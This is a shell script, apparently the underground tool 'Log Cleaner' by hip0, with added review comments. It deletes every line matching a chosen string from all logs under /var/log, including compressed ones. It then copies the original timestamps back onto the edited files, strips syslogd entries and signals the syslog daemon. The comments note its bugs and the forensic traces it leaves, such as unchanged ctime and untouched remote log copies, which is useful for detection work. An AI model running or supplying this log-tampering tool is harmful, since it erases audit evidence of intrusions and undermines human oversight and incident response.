#!/bin/sh
# Log Cleaner v. 0.6 by hip0. 
#               NO WARRANTIES USE AT YOUR OWN RISK !
# Under GPL ver. 2.0 or above. Check out www.gnu.org for more info.
# Greetings fly to:
# Authors of the underground-book -- http://www.underground-book.com
# Also to the beatiful of Midnigh Oil.
# Special thanx to this people for laying there asses in #pcfreak
# on uni-bg.
# STRASHARO, ORDER, UTP, necroleak, Static, Sic-a, vaso, dr0p,
# hip3, Hacko_; Sorry if i forgot someone.
# Everyone other that knows and respect me should feel greeted too ;]
# For bugs and suggestions, flames etc. sent to hipodilski@dahmer.vistech.net
# http://rootshell.be/~pcfreak -- Say no to M$.
# 
# Usage notes: the shell script takes 2 arguments.
# The 1st is the "string" whose matching lines are removed from all the
# files, dirs and subdirs in /var/log; the 2nd is optional: pass "-v" to get
# verbose output.
# Enjoy your cleaning:]
# Improved on Jun 23 2004: Fixed some bugs and stuff ....
# Improved on Feb 25 2005: Fixed bug that strips from wtmp and lastlog.
# Fixed funny bug with the strip from /var/log/faillog :] that
# makes root non loggable
# Enjoy!

# Staging directory: filtered copies of the logs are built here and later
# copied back over the originals. While the script runs (or if it is
# interrupted) this directory exists under /var/log as an on-disk artifact.
new_path="/var/log/new";

# Directory whose contents are rewritten.
log_dir="/var/log";

# Names skipped by the line filter. exclude1-3 are compared in chk_file,
# exclude4 in chk_dir. Per the header changelog, filtering wtmp, lastlog and
# faillog was treated as a bug, so this script leaves those files untouched;
# their records can be compared against the text logs during review.
exclude1="wtmp";
exclude2="lastlog";
exclude3="faillog";
exclude4="supervise";

# Pattern whose matching lines are dropped; taken as-is from the first
# command-line argument.
grep_var="$1";

# Internal state, not meant to be edited:
#   verbose    - the literal flag that switches on verbose output
#   string2    - the second command-line argument as given
#   cut_var    - basename of $new_path, used by chk_dir to skip the staging dir
#   verbose_on - set to 1 by chk_args when "-v" was passed, else empty
verbose='-v';
string2="$2";
cut_var="new";
verbose_on='';

# Change into $log_dir.
# Every later step lists and opens files by names relative to the current
# directory. The result of cd is not checked here, so if it fails the rest of
# the script keeps going in whatever directory it was started from.
change_to_def_dir () {
cd $log_dir;
}

# Empty the staging directory ($new_path) if it already exists.
# NOTE(review): $i is not assigned anywhere in this file before main calls
# this function (main_cycle runs afterwards), so unless i is inherited from
# the environment the second test is false and the rm below does not run.
# NOTE(review): "==" inside [ ] is not POSIX; how it behaves depends on which
# shell /bin/sh resolves to.
clean_dir () {
if test -d  $new_path && [ "$i" == "$log_dir" ]; then
rm -rf $new_path/*;
fi
}

# Validate the command line and set verbose_on.
# Globals: grep_var, string2, verbose (read); verbose_on (written).
# On rejected arguments it prints a usage banner and exits. The exit status
# is 0 even though this is the error path.
# NOTE(review): "||" and "&&" in a shell list have equal precedence and group
# left to right, so the first test reads (A || B) && C. With an empty first
# argument and "-v" as the second, C is false and the usage exit is skipped,
# so the script continues with an empty pattern.
# NOTE(review): "echo -e" and "==" inside [ ] are not POSIX; behaviour depends
# on which shell /bin/sh resolves to.
chk_args () {
 if [ -z "$grep_var" ] || \
 [ -n "$string2" ] && [ "$string2" != "$verbose" ]; then
  echo "Log Cleaner by hip0";
   echo "-=================-";
   echo -e "Bad Syntax, Examples:"
   echo -e "\n$0 string\nfor verbose: $0 string -v";
  exit 0;
 fi

 # Verbose mode is on only when the second argument is exactly "-v".
 if [ "$string2" == "$verbose" ]; then
  verbose_on=1;
   else
  verbose_on='';
 fi

}

# Create the staging directory $new_path when it does not exist yet.
# The "cat /dev/null" in the true branch does nothing; it only fills the
# branch so the mkdir can sit in the else. The result of mkdir is not checked.
chk_new_path_existence () {

 if test -d $new_path; then
  cat /dev/null;
   else
  mkdir $new_path;
 fi

}

# Handle one sub-directory of the log directory.
# Globals: i (read, then overwritten by the inner loop), new_path, log_dir,
#          grep_var, cut_var, exclude4, verbose_on (read);
#          z, new_i, gz_name, cut_gz (written).
# The directory named by $i is copied into the staging area, then every entry
# of the copy is decompressed, filtered with grep -v, recompressed under its
# original name and given the timestamps of the original file.
# Skipped: names matching the regex ".gz", the staging dir itself ($cut_var),
# the $exclude4 name, and anything for which "-s" is false.
# NOTE(review): how "[ ! -a "$i" ]" is parsed ("-a" as a unary file test or as
# the binary AND operator) differs between shells - confirm which applies.
# NOTE(review): the pattern ".gz" is a regex, so the dot matches any character.
# NOTE(review): the inner "for i" reuses the caller's loop variable; when this
# function returns, $i holds the last entry name of the sub-directory, and
# that is what chk_file and chk_gz_file see in the same main_cycle iteration.
# NOTE(review): every entry is written back through "gzip -c" regardless of
# its suffix - confirm what that does to entries that were not gzip files.
# NOTE(review): "${gz_name/.gz/}" and "==" inside [ ] are not POSIX.
chk_dir () {

 if [ -d "$i" ] && [ ! -a "$i" ] && \
[ -z "`echo $i | grep .gz`" ] && [ "$i" != "$cut_var" ] &&\
[ -s "$i" ] && [ "$i" != "$exclude4" ]; then
 # Remember the directory name before the inner loop overwrites $i.
 z="$i";
  cp -rfp $i $new_path/$i;
   new_i="$i";

     for i in `ls -1 $new_path/$new_i`; do
      gz_name="$i";
       cut_gz=${gz_name/.gz/};
        # Decompress to <name>.new1, filter to <name>.new, recompress over
        # the staged entry, then drop both intermediates.
        gzip -d -f -q -c $new_path/$new_i/$i > $new_path/$new_i/$cut_gz.new1;
       cat $new_path/$new_i/$cut_gz.new1 | grep -v "$grep_var" \
> $new_path/$new_i/$cut_gz.new;
     gzip -c -f -q $new_path/$new_i/$cut_gz.new > $new_path/$new_i/$i;
    rm -f $new_path/$new_i/$cut_gz.new; 
   rm -f $new_path/$new_i/$cut_gz.new1;
  # Copy access and modification times from the original onto the rewritten
  # entry. touch cannot set the inode change time (ctime), so that field is
  # not carried over and remains a point of comparison during review.
  touch -acmr $log_dir/$z/$i $new_path/$new_i/$i;

 if [ "$verbose_on" == 1 ]; then
  echo "Ungzipping: $i";
   echo "Grepping: $grep_var out of $i";
   echo "gzipping: $cut_gz as: $i";
  echo -e "Setting timestamps from: $log_dir/$z/$i\nto: $new_path/$new_i/$i";
 fi

      done
 fi
}

# Handle one plain (not gzipped) file in the log directory.
# Globals: i, new_path, log_dir, grep_var, exclude1-3, verbose_on (read).
# A copy of $i is placed in the staging area, emptied, refilled with the lines
# of the original that do not match $grep_var, and given the original's
# access and modification times.
# Skipped: directories, names matching the regex ".gz", empty files, and the
# three excluded names (wtmp, lastlog, faillog), which are therefore left as
# they were.
# NOTE(review): "-a" as a unary file test and "==" inside [ ] are not POSIX.
# NOTE(review): $grep_var is unquoted in the grep call, so a pattern with
# whitespace is split into several words.
chk_file () {
 if [ -a "$i" ] && [ ! -d "$i" ] && [ -z "`echo $i | grep .gz`" ] &&\
 [ "$i" != "$exclude1" ] && [ "$i" != "$exclude2" ] &&\
 [ "$i" != "$exclude3" ] && [ -s "$i" ]; then
  # cp -p first so the staged file carries the original's mode and owner.
  cp -rpf $i $new_path/$i;
  cat /dev/null > $new_path/$i;
  cat $i | grep -v $grep_var > $new_path/$i
  # Sets atime and mtime only; touch cannot set the inode change time
  # (ctime), so that field is not carried over.
  touch -acmr $log_dir/$i $new_path/$i; 

  if [ "$verbose_on" == 1 ]; then
   echo "Grepping: $grep_var out of: $i";
  fi

 fi
}

# Handle one gzipped file in the log directory.
# Globals: i, new_path, log_dir, grep_var, verbose_on (read);
#          gz_name, cut_gz (written).
# The file is copied to the staging area, decompressed there, filtered with
# grep -v, recompressed under its original name and given the original's
# access and modification times.
# NOTE(review): selection uses the regex ".gz" on the name, so the dot matches
# any character and the match is not anchored to the end of the name.
# NOTE(review): "-a" as a unary test, "${gz_name/.gz/}" and "==" inside [ ]
# are not POSIX; $grep_var is unquoted in the grep call.
chk_gz_file () {

if [ -n "`echo $i | grep .gz`" ] && [ -a "$i" ] && \
[ ! -d "$i" ] && [ -s "$i" ]; then

 cp -rpf $i $new_path/$i;
  # Decompress in place inside the staging area.
  gzip -d -f -q $new_path/$i;
   gz_name="$i";
  cut_gz=${gz_name/.gz/};
   cat $new_path/$cut_gz | grep -v $grep_var > $new_path/$cut_gz.new;
  gzip -c -f -q $new_path/$cut_gz.new > $new_path/$i;
   rm -f $new_path/$cut_gz.new; rm -f $new_path/$cut_gz;
  # Sets atime and mtime only; touch cannot set the inode change time
  # (ctime), so that field is not carried over.
  touch -acmr $log_dir/$i $new_path/$i;

 if [ "$verbose_on" == 1 ]; then
  echo "$i is gzipped file.";
   echo "Ungzipping $i at $new_path/$i.";
   echo "Catting $cut_gz and grepping $grep_var from it.";
  echo -e "Setting timestamps from: $log_dir/$i\n to $new_path/$i"; 
 fi

 fi
}

# Walk the current directory (expected to be $log_dir after
# change_to_def_dir) and run the three handlers on every entry.
# Globals: i (written by the loop and read by the handlers), new_path (read).
# The output of "ls -1" is word-split, so names containing whitespace are
# broken into separate words.
# NOTE(review): chk_dir overwrites $i when it processes a directory, so
# chk_file and chk_gz_file may then run against a different name than the one
# this loop supplied.
main_cycle () {

 for i in `ls -1`; do
  chk_dir;
  chk_file;
  chk_gz_file;
 done

# Remove any staged entry that carries this script's own file name.
rm -f $new_path/`basename $0`;

}

# Copy everything from the staging directory back into $log_dir, overwriting
# the originals. cp -p keeps the mode, ownership and the timestamps the
# handlers set on the staged files.
# Globals: new_path, log_dir, verbose_on (read).
copy_to_orig_dest () {

if [ "$verbose_on" == 1 ]; then
 echo "Copying $new_path's content to: $log_dir";
fi
cp -rpf $new_path/* $log_dir;

}

# NOTE(review): this "if" is a top-level statement, not part of a function. It
# runs while the file is being read, before main calls chk_args, when
# verbose_on still holds its initial empty value, so the message is not
# printed even with -v.
if [ "$verbose_on" == 1 ]; then
echo "Now $new_path GO TO HELL!!!";
fi
# Delete the staging directory and everything in it.
get_rid_of_junk () {
rm -rf $new_path;
}

 # Strip syslogd lines from the main text logs, then signal syslogd.
 # Globals: log_dir (read); sys, mesg, sysl, fail (written; fail is not used).
 # Every line containing "syslogd" is removed from $log_dir/messages and
 # $log_dir/syslog, whatever pattern the user passed in. Each file is written
 # to "<name>.new" and renamed over the original, so the result is a newly
 # created file rather than the original one with its timestamps.
 # Despite the name, the daemon is not restarted: it is sent SIGHUP through
 # killall if "ps ax" lists a syslogd process.
 # NOTE(review): presumably the HUP is there so the daemon reopens its log
 # files after the rename - confirm for the syslog implementation in use.
rest_syslogd () {
 sys="syslogd";
 mesg="$log_dir/messages";
 sysl="$log_dir/syslog";
 fail="$log_dir/faillog";
 if [ -f "$mesg" ]; then
    cat $mesg | grep -v $sys > $mesg.new
    mv $mesg.new $mesg;
   fi

   if [ -f "$sysl" ]; then
    cat $sysl | grep -v $sys > $sysl.new;
     mv $sysl.new $sysl;
     fi
      if [ "$(ps ax | grep syslogd| grep -v grep)" ]; then
      killall -s HUP syslogd;
      fi

      }
      


# Entry point: runs the steps in a fixed order -
#   cd to the log dir, validate arguments, create and clean the staging dir,
#   filter every entry into staging, copy staging back over the originals,
#   delete staging, then filter syslogd lines and signal the daemon.
# No step checks the result of the previous one.
# Everything here works on local files under $log_dir. Copies of the same
# logs held elsewhere (remote syslog targets, backups) are not touched by any
# step and can serve as the baseline when checking a host for this kind of
# rewrite.
main () {

 change_to_def_dir;
 chk_args;
 chk_new_path_existence;
 clean_dir;
 main_cycle;
 copy_to_orig_dest;
 get_rid_of_junk;
 rest_syslogd;

}
 # Invoked without "$@": the functions read the command line through the
 # grep_var and string2 globals captured at the top of the file.
 main;

